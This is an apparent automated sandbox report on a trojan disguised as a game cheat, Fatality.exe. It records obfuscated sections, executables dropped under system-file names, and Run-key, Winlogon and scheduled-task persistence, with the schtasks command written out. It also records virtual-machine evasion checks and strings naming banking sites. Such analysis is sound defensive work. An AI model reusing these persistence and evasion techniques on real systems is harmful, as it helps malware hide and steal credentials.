                              Source: Binary string: :C:\Users\user\AppData\Local\Temp\2csyxc1q\2csyxc1q.pdb source: BridgeInto.exe, 00000006.00000002.2336699470.000000000373F000.00000004.00000800.00020000.00000000.sdmp

                              Data Obfuscation

                              Source: C:\Users\user\Desktop\Fatality.exe Unpacked PE file: 0.2.Fatality.exe.890000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;Unknown_Section5:EW;.rsrc:EW;Unknown_Section7:EW;cheat:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:W;Unknown_Section4:R;Unknown_Section5:R;.rsrc:EW;Unknown_Section7:EW;cheat:EW;
                              Source: C:\Bridgemonitor\BridgeInto.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline"
                              Source: C:\Bridgemonitor\BridgeInto.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2csyxc1q\2csyxc1q.cmdline"
                              Source: C:\Users\user\Desktop\Fatality.exe File created: C:\Bridgemonitor\__tmp_rar_sfx_access_check_4558562
                              Source: Fatality.exe Static PE information: section name:
                              Source: Fatality.exe Static PE information: section name: cheat
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_009A219C push ecx; mov dword ptr [esp], edx 0_2_009A219E
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_0099E104 push ecx; mov dword ptr [esp], edx 0_2_0099E109
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_0099228C push 009926D8h; ret 0_2_009926D0
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_0098A3EA push 0098A418h; ret 0_2_0098A410
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_0099E32C push ecx; mov dword ptr [esp], edx 0_2_0099E331
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_0098A494 push 0098A4C0h; ret 0_2_0098A4B8
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_0099E48C push ecx; mov dword ptr [esp], edx 0_2_0099E491
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_0098A4F8 push 0098A52Ch; ret 0_2_0098A524
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_009A840C push ecx; mov dword ptr [esp], edx 0_2_009A8411
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_0098A424 push 0098A450h; ret 0_2_0098A448
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_0098A45C push 0098A488h; ret 0_2_0098A480
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_0099C454 push 0099C4A1h; ret 0_2_0099C499
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_0099E448 push ecx; mov dword ptr [esp], edx 0_2_0099E44D
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_009885F0 push 00988641h; ret 0_2_00988639
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_0099A536 push 0099A5B5h; ret 0_2_0099A5AD
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_009A054C push ecx; mov dword ptr [esp], edx 0_2_009A054D
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_009926DA push 0099274Bh; ret 0_2_00992743
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_009888AA push 009888D8h; ret 0_2_009888D0
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_0099A804 push 0099A830h; ret 0_2_0099A828
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_0099285E push 0099288Ch; ret 0_2_00992884
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_00988968 push 00988994h; ret 0_2_0098898C
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_0099CB08 push esp; retf 0_2_0099CB09
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_0099CB28 push esp; retf 0_2_0099CB29
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_00984F90 push eax; ret 0_2_00984FCC
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_009A0F70 push ecx; mov dword ptr [esp], ecx 0_2_009A0F75
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_0099B3A0 push 0099B400h; ret 0_2_0099B3F8
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_0099B524 push 0099B5A4h; ret 0_2_0099B59C
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_0099B684 push ecx; mov dword ptr [esp], ecx 0_2_0099B687
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_009996A4 push 0099974Ch; ret 0_2_00999744
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_0099962C push 009996A2h; ret 0_2_0099969A
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_00999760 push 0099979Ch; ret 0_2_00999794
                              Source: Fatality.exe Static PE information: section name: entropy: 7.996936789356691
                              Source: Fatality.exe Static PE information: section name: entropy: 7.977874239971029
                              Source: Fatality.exe Static PE information: section name: entropy: 7.478628519160346
                              Source: Fatality.exe Static PE information: section name: entropy: 7.946335906125016
                              Source: Fatality.exe Static PE information: section name: entropy: 7.85259808088101
                              Source: Fatality.exe Static PE information: section name: cheat entropy: 7.985166472762615
                              Source: BridgeInto.exe.0.dr Static PE information: section name: .text entropy: 7.553608083833407
                              Source: WinStore.App.exe.6.dr Static PE information: section name: .text entropy: 7.553608083833407
                              Source: dllhost.exe.6.dr Static PE information: section name: .text entropy: 7.553608083833407
                              Source: EoNanmDGxPEtougVgAjHLx.exe.6.dr Static PE information: section name: .text entropy: 7.553608083833407
                              Source: EoNanmDGxPEtougVgAjHLx.exe0.6.dr Static PE information: section name: .text entropy: 7.553608083833407
                              Source: EoNanmDGxPEtougVgAjHLx.exe1.6.dr Static PE information: section name: .text entropy: 7.553608083833407

                              Persistence and Installation Behavior

                              Source: C:\Bridgemonitor\BridgeInto.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              Source: C:\Bridgemonitor\BridgeInto.exe File created: C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe
                              Source: C:\Users\user\Desktop\Fatality.exe File created: C:\Bridgemonitor\BridgeInto.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\Bridgemonitor\BridgeInto.exe File created: C:\Recovery\dllhost.exe
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe File created: C:\Users\user\Desktop\AqqubUji.log
                              Source: C:\Bridgemonitor\BridgeInto.exe File created: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe File created: C:\Users\user\Desktop\UXzikyum.log
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe File created: C:\Users\user\Desktop\rfcELAFu.log
                              Source: C:\Bridgemonitor\BridgeInto.exe File created: C:\Users\user\Desktop\pMLeDcaM.log
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe File created: C:\Users\user\Desktop\LfISQjWH.log
                              Source: C:\Bridgemonitor\BridgeInto.exe File created: C:\Users\user\Desktop\MMFizuKP.log
                              Source: C:\Bridgemonitor\BridgeInto.exe File created: C:\Users\user\Desktop\EiwsPBui.log
                              Source: C:\Bridgemonitor\BridgeInto.exe File created: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                              Source: C:\Bridgemonitor\BridgeInto.exe File created: C:\Users\user\Desktop\XAjYjGFx.log
                              Source: C:\Bridgemonitor\BridgeInto.exe File created: C:\Users\user\Desktop\nKZvhtVR.log
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe File created: C:\Users\user\Desktop\vVSvSxGn.log
                              Source: C:\Bridgemonitor\BridgeInto.exe File created: C:\ProgramData\ssh\WinStore.App.exe

                              Boot Survival

                              Source: C:\Bridgemonitor\BridgeInto.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                              Source: C:\Bridgemonitor\BridgeInto.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BridgeInto
                              Source: C:\Bridgemonitor\BridgeInto.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EoNanmDGxPEtougVgAjHLx
                              Source: C:\Bridgemonitor\BridgeInto.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinStore.App
                              Source: C:\Bridgemonitor\BridgeInto.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost
                              Source: C:\Bridgemonitor\BridgeInto.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe'" /f
                              Source: C:\Bridgemonitor\BridgeInto.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EoNanmDGxPEtougVgAjHLx
                              Source: C:\Bridgemonitor\BridgeInto.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost
                              Source: C:\Bridgemonitor\BridgeInto.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinStore.App
                              Source: C:\Users\user\Desktop\Fatality.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\dllhost.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Bridgemonitor\BridgeInto.exe Memory allocated: E70000 memory reserve | memory write watch
                              Source: C:\Bridgemonitor\BridgeInto.exe Memory allocated: 1AD10000 memory reserve | memory write watch
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Memory allocated: 1390000 memory reserve | memory write watch
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Memory allocated: 1B320000 memory reserve | memory write watch
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Memory allocated: 9F0000 memory reserve | memory write watch
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Memory allocated: 1A6D0000 memory reserve | memory write watch
                              Source: C:\Bridgemonitor\BridgeInto.exe Memory allocated: 13D0000 memory reserve | memory write watch
                              Source: C:\Bridgemonitor\BridgeInto.exe Memory allocated: 1AEC0000 memory reserve | memory write watch
                              Source: C:\Bridgemonitor\BridgeInto.exe Memory allocated: 1870000 memory reserve | memory write watch
                              Source: C:\Bridgemonitor\BridgeInto.exe Memory allocated: 1B210000 memory reserve | memory write watch
                              Source: C:\Recovery\dllhost.exe Memory allocated: 1680000 memory reserve | memory write watch
                              Source: C:\Recovery\dllhost.exe Memory allocated: 1B0B0000 memory reserve | memory write watch
                              Source: C:\Recovery\dllhost.exe Memory allocated: 2B10000 memory reserve | memory write watch
                              Source: C:\Recovery\dllhost.exe Memory allocated: 1ACF0000 memory reserve | memory write watch
                              Source: C:\Bridgemonitor\BridgeInto.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 600000
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 599874
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 599734
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 599000
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 3600000
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 598500
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 598343
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 597609
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 597390
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 597125
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 597000
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 596875
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 596656
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 596499
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 596296
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 595562
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 594828
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 594677
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 594531
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 594397
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 594198
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 594093
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 593965
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 593855
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 593740
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 593608
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 593499
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 593390
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 593280
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 593170
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 593058
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 592950
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 592843
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 592731
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 592015
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 591905
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 591796
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 591687
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 591578
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 591468
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 591358
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 591210
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 591108
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 590999
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 590883
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 590781
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 590671
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 590562
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 590453
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 590343
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 590234
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 590122
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 590006
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 589813
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 589409
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 589281
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 589171
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 589062
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Thread delayed: delay time: 588952
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 922337203685477
                              Source: C:\Bridgemonitor\BridgeInto.exeThread delayed: delay time: 922337203685477
                              Source: C:\Bridgemonitor\BridgeInto.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\dllhost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\dllhost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                              Source: C:\Users\user\Desktop\Fatality.exe Window / User API: threadDelayed 424
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Window / User API: threadDelayed 4784
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Window / User API: threadDelayed 4840
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Dropped PE file which has not been started: C:\Users\user\Desktop\AqqubUji.log
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Dropped PE file which has not been started: C:\Users\user\Desktop\UXzikyum.log
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rfcELAFu.log
                              Source: C:\Bridgemonitor\BridgeInto.exe Dropped PE file which has not been started: C:\Users\user\Desktop\pMLeDcaM.log
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Dropped PE file which has not been started: C:\Users\user\Desktop\LfISQjWH.log
                              Source: C:\Bridgemonitor\BridgeInto.exe Dropped PE file which has not been started: C:\Users\user\Desktop\MMFizuKP.log
                              Source: C:\Bridgemonitor\BridgeInto.exe Dropped PE file which has not been started: C:\Users\user\Desktop\EiwsPBui.log
                              Source: C:\Bridgemonitor\BridgeInto.exe Dropped PE file which has not been started: C:\Users\user\Desktop\XAjYjGFx.log
                              Source: C:\Bridgemonitor\BridgeInto.exe Dropped PE file which has not been started: C:\Users\user\Desktop\nKZvhtVR.log
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe Dropped PE file which has not been started: C:\Users\user\Desktop\vVSvSxGn.log
                              Source: C:\Windows\System32\dllhost.exe File opened: PhysicalDrive0
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                              Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
                              Source: C:\Bridgemonitor\BridgeInto.exe File Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe File Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe File Volume queried: C:\ FullSizeInformation
                              Source: C:\Bridgemonitor\BridgeInto.exe File Volume queried: C:\ FullSizeInformation
                              Source: C:\Bridgemonitor\BridgeInto.exe File Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\dllhost.exe File Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\dllhost.exe File Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\Fatality.exe Code function: 0_2_04D5685F NtQueryInformationProcess,GetSystemInfo,0_2_04D5685F
                              Source: C:\Bridgemonitor\BridgeInto.exe File opened: C:\Users\user\AppData
                              Source: C:\Bridgemonitor\BridgeInto.exe File opened: C:\Users\user\AppData\Local
                              Source: C:\Bridgemonitor\BridgeInto.exe File opened: C:\Users\user
                              Source: C:\Bridgemonitor\BridgeInto.exe File opened: C:\Users\user\Documents\desktop.ini
                              Source: C:\Bridgemonitor\BridgeInto.exe File opened: C:\Users\user\Desktop\desktop.ini
                              Source: C:\Bridgemonitor\BridgeInto.exe File opened: C:\Users\user\AppData\Local\Temp
                              Source: VUumaksQ1L.25.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                              Source: VUumaksQ1L.25.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                              Source: VUumaksQ1L.25.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                              Source: BridgeInto.exe, 00000006.00000002.2349417385.000000001C124000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*
                              Source: VUumaksQ1L.25.drBinary or memory string: discord.comVMware20,11696487552f
                              Source: VUumaksQ1L.25.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                              Source: VUumaksQ1L.25.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                              Source: VUumaksQ1L.25.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                              Source: WebCacheV01.dat.8.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                              Source: VUumaksQ1L.25.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                              Source: VUumaksQ1L.25.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                              Source: VUumaksQ1L.25.drBinary or memory string: global block list test formVMware20,11696487552
                              Source: VUumaksQ1L.25.drBinary or memory string: tasks.office.comVMware20,11696487552o
                              Source: Fatality.exe, 00000000.00000002.2133322697.0000000000982000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: &VBoxService.exe
                              Source: VUumaksQ1L.25.drBinary or memory string: AMC password management pageVMware20,11696487552
                              Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3408421293.000000001BAE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: VUumaksQ1L.25.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                              Source: VUumaksQ1L.25.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                              Source: VUumaksQ1L.25.drBinary or memory string: dev.azure.comVMware20,11696487552j
                              Source: VUumaksQ1L.25.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                              Source: VUumaksQ1L.25.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                              Source: Fatality.exe, 00000000.00000002.2133322697.0000000000982000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VBoxService.exe
                              Source: VUumaksQ1L.25.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                              Source: VUumaksQ1L.25.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                              Source: Fatality.exe, Fatality.exe, 00000000.00000002.2133322697.0000000000AC8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ~VirtualMachineTypes
